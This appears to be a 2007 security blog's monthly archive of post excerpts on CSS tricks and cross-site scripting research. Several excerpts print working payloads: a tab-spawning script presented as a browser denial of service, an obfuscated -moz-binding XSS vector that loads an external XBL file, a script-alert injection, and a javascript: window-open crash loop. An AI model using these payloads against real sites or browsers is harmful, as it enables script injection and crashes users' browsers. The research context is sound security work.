Hacking CSS is a great challenge and can lead to interesting results. I’ve reignited my interest thanks to sirdarckcat and Thornmaker, who have done some fantastic work. I wanted a way to do animation and loops in pure CSS and I think it’s sorta possible using meta refresh. I know meta refresh is slightly cheating […]
Archives for the Month of November, 2007
CSS toggle buttons
Thursday, 29 November 2007
Thornmaker has improved my CSS logic script, which is now much neater and requires fewer styles, good work :) Sirdarckcat has also created multiplication, which is amazing stuff, so I had a bit of spare time and I decided to see if it was possible to create toggles in CSS with a visual appearance of a […]
Browser window spawning DOS
Wednesday, 28 November 2007
This causes DOS in the latest Safari and maybe other browsers too. I tried it in Opera and it does create loads of tabs but seems stable enough to close it down. Enjoy! :) <script type="text/javascript"> window.onload = function() { setInterval('spawn()',1); } function spawn() { frm = document.createElement('form'); frm.target = 'x' + Math.round(Math.random() * 100000); […]
CSS logic
Tuesday, 27 November 2007
Inspired by the great work of Sirdarckcat on CSK2, I’ve decided to produce a POC which performs basic logic in pure CSS. The example simply adds the numbers together depending on which checkbox you check. My next experiment will be with loops and then we can start creating some really cool games in CSS :) […]
Latest security news
Tuesday, 27 November 2007
There’s some really awesome stuff going on at the moment, so I thought I’d mention a few in case you’re not aware of them. PHPIDS: This is such a great project because so many talented people have been involved and have tried to hack the system. The code has moved on tremendously from the first version […]
Ultimate XSS CSS injection
Monday, 26 November 2007
Here’s a final XSS CSS vector which works on IE7 and Firefox. The IE7 vector was based on the brilliant work of Martin, which I modified slightly, and I found that IE will also accept htmlentities in CSS styles. Credits update: The expression part of this technique was first demonstrated by Dan on the slackers forums, […]
htmlentities is badly designed
Monday, 26 November 2007
I’ve seen it time and time again: when someone uses htmlentities, they expect it to filter all XSS from their variables. This is wrong, of course, because the function requires a second parameter, ENT_QUOTES, which correctly replaces quote characters. Some developers aren’t even aware that quotes can lead to XSS injection. This leads me to […]
Awesome XSS
Saturday, 24 November 2007
Hacking the PHPIDS again I found some cool XSS:- <div/style=\-\mo\z\-b\i\nd\in\g:\url(//business \i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)> I’ve moved it onto two lines for correct display. Who’d have thought that Firefox would allow all that within the url and CSS properties :)
WebFu crouching tab hidden dos
Friday, 23 November 2007
Hello my student, here I’ll show you the way of the tiger. If a deadly Firefox ninja approaches your dojo with an XSS punch:- "><script>alert(/XSS PUNCH!/)</script> then you can respond with the crouching tab hidden dos move:- self.location = "javascript:window.open('javascript:document.clear(); document.open();document.close();self.location=self.location')"; This move can frustrate your opponent into submission.
Tag inspector
Thursday, 22 November 2007
I’ve been trying to automate the stuff that I normally do when XSS testing to make it easier than writing custom scripts each time. This worked really well for my fuzzing script which fuzzed random characters embedded into tags to find unusual combinations of characters. I’ve done the same again but this time it inspects […]